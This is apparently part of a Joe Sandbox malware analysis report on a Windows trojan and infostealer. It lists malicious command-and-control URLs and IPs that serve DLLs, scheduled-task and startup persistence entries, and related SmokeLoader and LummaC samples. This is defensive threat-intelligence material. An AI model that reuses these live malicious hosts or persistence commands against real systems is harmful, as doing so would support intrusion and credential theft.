https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Avira URL Cloud	safe
http://91.202.233.158/3836fd5700214436/nss3.dll	100%	Avira URL Cloud	malware
http://www.x-ways.net/winhex/license	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
epohe.ru	185.12.79.25	true	true	1%, Virustotal, Browse	unknown
free.cdn.hstgr.net	84.32.84.144	true	true	0%, Virustotal, Browse	unknown
www.darkviolet-alpaca-923878.hostingersite.com	unknown	unknown	true		unknown
ycMmBvpGeMcYHBMfFqkIrUsoh.ycMmBvpGeMcYHBMfFqkIrUsoh	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.202.233.158/3836fd5700214436/msvcp140.dll	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/3836fd5700214436/sqlite3.dll	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/3836fd5700214436/vcruntime140.dll	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/3836fd5700214436/nss3.dll	true	Avira URL Cloud: malware	unknown
http://91.202.233.158/3836fd5700214436/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://nicetolosv.xyz/tmp/	true	Avira URL Cloud: safe	unknown
http://olihonols.in.net/tmp/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://91.202.233.158/e96ea2db21fa9a1b.phpK	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1703368759.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	IECFHDBA.29.dr	false	URL Reputation: safe	unknown
http://91.202.233.158/3836fd5700214436/nss3.dllA5	svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	IECFHDBA.29.dr	false	URL Reputation: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://91.202.233.158/3836fd5700214436/nss3.dll%	svchost015.exe, 0000001D.00000002.2618548795.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php.dll	svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704715234.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	false	URL Reputation: safe	unknown
http://www.x-ways.net/winhex/subscribe-d.htmlU	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.autoitscript.com/autoit3/	Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, Burn.pif, 00000011.00000003.2924741596.000000000350A000.00000004.00000020.00020000.00000000.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php3	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	KJEHDHIEGIIIDHIDHDHJ.29.dr	false	Avira URL Cloud: safe	unknown
http://www.x-ways.net/order.html-d.htmlS	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/3836fd5700214436/msvcp140.dllj	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpK0	svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php7	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1706663515.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/3836fd5700214436/nss3.dll:	svchost015.exe, 0000001D.00000002.2618548795.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.4107921007.00000000028D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php-fulluser-l1-1-0	svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php?	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.epnacl	svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	Burn.pif, 00000011.00000000.2216560100.00000000006E9000.00000002.00000001.01000000.00000007.sdmp, Burn.pif, 00000011.00000003.2227175462.0000000003C5B000.00000004.00000800.00020000.00000000.sdmp, SwiftServe.scr, 00000019.00000000.2241141842.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmp, SwiftServe.scr, 0000001C.00000002.2435797757.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmp, SwiftServe.scr.17.dr, Dod.7.dr, Burn.pif.8.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1706663515.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	svchost015.exe, svchost015.exe, 0000001D.00000002.2675141656.000000006C8AD000.00000002.00000001.01000000.0000000F.sdmp, mozglue[1].dll.29.dr, mozglue.dll.29.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/7	svchost015.exe, 0000001D.00000002.2618548795.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mozilla.org0/	freebl3.dll.29.dr, softokn3.dll.29.dr, nss3.dll.29.dr, nss3[1].dll.29.dr, mozglue[1].dll.29.dr, mozglue.dll.29.dr	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000042C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	svchost015.exe, 0000001D.00000002.2614164343.000000000042C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	IECFHDBA.29.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	svchost015.exe, 0000001D.00000002.2662277736.0000000026E12000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, KJEHDHIEGIIIDHIDHDHJ.29.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	svchost015.exe, 0000001D.00000003.2483405592.0000000020D21000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000042C000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	329C.exe, 00000007.00000002.2197214813.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 329C.exe, 00000007.00000002.2197633579.0000000000873000.00000002.00000001.01000000.00000006.sdmp, 329C.exe, 00000007.00000000.2189914401.0000000000408000.00000002.00000001.01000000.00000006.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/E	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, IECFHDBA.29.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	false	URL Reputation: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ep	svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpg	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354rCannot	RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpo	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/winhex/license	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	false	Avira URL Cloud: safe	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/3836fd5700214436/softokn3.dllR	svchost015.exe, 0000001D.00000002.2618548795.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	FCAAEBFHJJDAAKFIECGDBKJDGI.29.dr	false	URL Reputation: safe	unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1704715234.000000000982D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1703368759.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpg0	svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1706663515.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e173810.9	svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.26.dr	false	URL Reputation: safe	unknown
https://github.com/tesseract-ocr/tessdata/	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost015.exe, 0000001D.00000002.2618548795.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, IECFHDBA.29.dr	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpN=	svchost015.exe, 0000001D.00000002.2618548795.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	svchost015.exe, 0000001D.00000003.2483405592.0000000020D21000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2614164343.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1703982523.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1705430014.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1704330354.0000000008720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/order	DFA6.exe, 0000001A.00000002.2426601330.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000000.2401576830.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, svchost015.exe.26.dr	false	Avira URL Cloud: safe	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	RegAsm.exe, 0000001F.00000002.4107921007.0000000002494000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1703368759.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phption:	svchost015.exe, 0000001D.00000002.2614164343.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.158	unknown	Russian Federation	9009	M247GB	true
94.228.169.44	unknown	Russian Federation	49245	SSERVICE-ASRU	true
92.36.226.66	unknown	Bosnia and Herzegowina	9146	BIHNETBIHNETAutonomusSystemBA	true
84.32.84.144	free.cdn.hstgr.net	Lithuania	33922	NTT-LT-ASLT	true
191.191.224.16	unknown	Brazil	28573	CLAROSABR	true
45.202.35.38	unknown	Seychelles	139086	ONL-HKOCEANNETWORKLIMITEDHK	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502474
Start date and time:	2024-09-01 18:26:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	h8jGj6Qe78.exe renamed because original name is a hash value
Original Sample Name:	fd192fb05e0cd219b14c5bf345f33cfb.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@47/50@7/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 108 Number of non-executed functions: 298
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.159.68, 40.126.31.67, 20.190.159.64, 20.190.159.73, 40.126.31.69, 20.190.159.0, 20.190.159.4, 20.190.159.23
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:27:00	API Interceptor	138048x Sleep call for process: explorer.exe modified
12:27:47	API Interceptor	1x Sleep call for process: 329C.exe modified
12:27:50	API Interceptor	392x Sleep call for process: Burn.pif modified
12:29:25	API Interceptor	1339x Sleep call for process: RegAsm.exe modified
17:27:15	Task Scheduler	Run new task: Firefox Default Browser Agent A6CAED999B8A5C30 path: C:\Users\user\AppData\Roaming\ewggbbh
17:27:50	Task Scheduler	Run new task: Cheese path: wscript s>//B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"
17:27:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
92.36.226.66	fEz10JQnRZ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	D9pL02CCa3.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	yosoborno.com/tmp/
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	yosoborno.com/tmp/
	yEIhhlohep.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	mzxn.ru/tmp/index.php
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	PureLog Stealer, SmokeLoader	Browse	nidoe.org/tmp/index.php
45.202.35.38	file.exe	Get hash	malicious	Unknown	Browse
45.202.35.38	file.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
free.cdn.hstgr.net	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.pt	Get hash	malicious	Unknown	Browse	154.62.105.236
free.cdn.hstgr.net	https://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html%23e.szejgis@arlen.com.pl&c=E%2C10%2CGElLHQ3V9C4dUNBFMZt1mVRH2LpMhvMQrmpyxCta58errD7FQTDbxAt4Y5cCMR6WJVxZVMHk4h8%2BUN47&typo=1&know=0	Get hash	malicious	Unknown	Browse	84.32.84.212

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	firmware.arm-linux-gnueabihf.elf	Get hash	malicious	Unknown	Browse	172.111.253.69
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	158.46.140.117
	OFFER-INQUIRY.jar	Get hash	malicious	STRRAT	Browse	37.120.199.54
	http://stream.crichd.vip/update/sscricket.php	Get hash	malicious	Unknown	Browse	38.132.109.126
	1724161253.9014926.dll	Get hash	malicious	Unknown	Browse	172.86.67.94
	1724161253.9014926.dll	Get hash	malicious	Unknown	Browse	172.86.67.94
	bat.bat	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer, XWorm, zgRAT	Browse	45.74.46.102
	https://lenta.ru/articles/2023/01/13/darkpr/	Get hash	malicious	HTMLPhisher	Browse	37.230.131.21
	bat.bat	Get hash	malicious	AsyncRAT, DcRat, PureLog Stealer, XWorm, zgRAT	Browse	45.74.46.102
	sostener.vbs	Get hash	malicious	Remcos	Browse	91.202.233.169
BIHNETBIHNETAutonomusSystemBA	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	109.175.29.39
